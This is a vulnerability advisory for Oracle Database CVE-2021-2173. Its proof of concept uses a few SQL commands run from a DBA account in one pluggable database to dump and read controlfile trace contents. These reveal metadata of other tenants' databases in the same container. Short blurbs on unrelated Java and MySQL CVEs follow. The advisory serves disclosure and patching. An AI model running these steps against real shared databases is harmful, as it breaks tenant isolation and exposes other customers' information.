Headline
Oracle DB Broken PDB Isolation / Metadata Exposure
Proof of concept details for Oracle database versions 12.1.0.2, 12.2.0.1, 18c, and 19c that had a PDB isolation vulnerability allowing viewing of metadata for a different database within the same container.
Title: CVE-2021-2173 – PDB Isolation is broken through metadata exposure
Product: Database
Manufacturer: Oracle
Affected Version(s): 12.1.0.2, 12.2.0.1, 18c, 19c
Tested Version(s): 19c
Risk Level: Medium
Solution Status: Fixed
CVE Reference: CVE-2021-2173
Author of Advisory: Emad Al-Mousa
Overview:
Oracle CDB Architecture was introduced in Oracle starting from 12cR1 as a shift in their architecture to adopt Multitenancy approach for Cloud infrastructure deployment. As any other new architecture, security issues/vulnerabilities can take place. In this vulnerability I am going to show that from PDB level with account granted DBA role I can extract metadata information of other pluggable databases within the same container.
Vulnerability Details:
attacker in a pluggable database can exfiltrate metdata info. for other co-existing databases within the same container.
Proof of Concept (PoC):
I will create account called “ironman” in PDB1:
sqlplus / as sysdba
SQL> alter session set container=PDB1;
SQL> create user ironman identified by ironman_2021;
SQL> grant create session to ironman;
SQL> grant dba to ironman;
SQL> alter user ironman default role all;
SQL> exit;
Then, I will connect using ironman to PDB1 and execute the following:
// dumping controlfile contents
SQL> alter session set events 'immediate trace name controlf level 4’;
SQL> select * from v$diag_info where NAME=’Default Trace File’;
SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME=’ORCLCDB_ora_7387.trc’;
After Inspecting the output, for example we can now know the location of SYSTEM data file for PDB2 database within the same container in addition to other information.
So, from PDB1 the attacker will be able to view the metadata information of other customer’s PDB’s within the same container, this should not be happening in the first place as ISOLATION should be enforced !
References:
https://www.oracle.com/security-alerts/cpuapr2021.html
https://nvd.nist.gov/vuln/detail/CVE-2021-2173
https://databasesecurityninja.wordpress.com/2021/06/04/cve-2021-2173-pdb-isolation-is-broken-through-metadata-exposure/
Related news
Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16; Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20.3.1.2 and 21.0.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.3 (Integrity impacts). CV...
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 5.7.33 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).